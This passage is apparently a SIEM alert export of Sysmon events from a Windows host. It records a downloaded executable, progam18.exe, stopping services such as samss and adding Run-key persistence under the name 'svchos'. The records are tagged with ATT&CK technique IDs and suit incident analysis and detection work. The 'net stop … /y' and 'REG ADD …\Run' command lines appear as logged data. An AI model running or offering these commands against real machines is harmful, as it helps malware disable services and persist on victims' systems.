\\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:22.142",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 23, 2020 @ 12:38:14.357",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:20:06.156 +ProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100} +ProcessId: 42832 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John Williams\Downloads\sQCMgCG.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:06.176674400Z"",""eventRecordID"":""1088"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:20:06.156\r\nProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100}\r\nProcessId: 42832\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:20:06.156"",""processGuid"":""{df9fc3d3-d186-5ec7-0000-00107e962100}"",""processId"":""42832"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe""}}}" +"May 23, 2020 @ 12:38:14.244",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:06.011 +ProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100} +ProcessId: 42832 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-d184-5ec7-0000-00105e272100} +ParentProcessId: 39604 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f""","REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:06.013837900Z"",""eventRecordID"":""1085"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:06.011\r\nProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100}\r\nProcessId: 42832\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-d184-5ec7-0000-00105e272100}\r\nParentProcessId: 39604\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:06.011"",""processGuid"":""{df9fc3d3-d186-5ec7-0000-00107e962100}"",""processId"":""42832"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-d184-5ec7-0000-00105e272100}"",""parentProcessId"":""39604"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:38:10.557",9,"Windows Application error event","""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xfc8 +Faulting application start time: 0x01d6303b578d1d2e +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4f923674-84bd-4ac6-b470-6cc2e5763025 +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""",, +"May 23, 2020 @ 12:38:05.475",9,"Windows Application error event","""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff75b59e38d +Faulting process id: 0xd08 +Faulting application start time: 0x01d6303b4d942d6b +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: unknown +Report Id: 31dbde77-5b08-4977-9049-74aa3437b70e +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:54.005",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:19:45.444 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00} +ProcessId: 8244 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John Williams\Downloads\progam18.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.463405100Z"",""eventRecordID"":""1063"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:19:45.444\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00}\r\nProcessId: 8244\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\progam18.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:19:45.444"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-0010d0af1c00}"",""processId"":""8244"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe""}}}" +"May 23, 2020 @ 12:37:53.998",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:45.355 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00} +ProcessId: 8244 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\progam18.exe"" /f +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-d170-5ec7-0000-00108e7f1c00} +ParentProcessId: 6372 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\progam18.exe"" /f""","REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.386698100Z"",""eventRecordID"":""1062"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:45.355\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00}\r\nProcessId: 8244\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" /f\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-d170-5ec7-0000-00108e7f1c00}\r\nParentProcessId: 6372\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" /f\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:45.355"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-0010d0af1c00}"",""processId"":""8244"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\"" /f"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-d170-5ec7-0000-00108e7f1c00}"",""parentProcessId"":""6372"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:37:53.946",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:45.169 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-0010e2a91c00} +ProcessId: 7844 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d170-5ec7-0000-001030831c00} +ParentProcessId: 6592 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.187026600Z"",""eventRecordID"":""1059"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:45.169\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-0010e2a91c00}\r\nProcessId: 7844\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d170-5ec7-0000-001030831c00}\r\nParentProcessId: 6592\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:45.169"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-0010e2a91c00}"",""processId"":""7844"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d170-5ec7-0000-001030831c00}"",""parentProcessId"":""6592"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:37:53.946",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:45.184 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-00108aaa1c00} +ProcessId: 7860 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00} +ParentProcessId: 4060 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.188295700Z"",""eventRecordID"":""1060"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:45.184\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-00108aaa1c00}\r\nProcessId: 7860\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00}\r\nParentProcessId: 4060\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:45.184"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-00108aaa1c00}"",""processId"":""7860"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d170-5ec7-0000-0010b1951c00}"",""parentProcessId"":""4060"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:37:53.036",10,"Multiple Windows error Application events","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """,, +"May 23, 2020 @ 12:37:53.027",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.611 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00} +ProcessId: 4060 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.613491000Z"",""eventRecordID"":""1058"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.611\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00}\r\nProcessId: 4060\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: 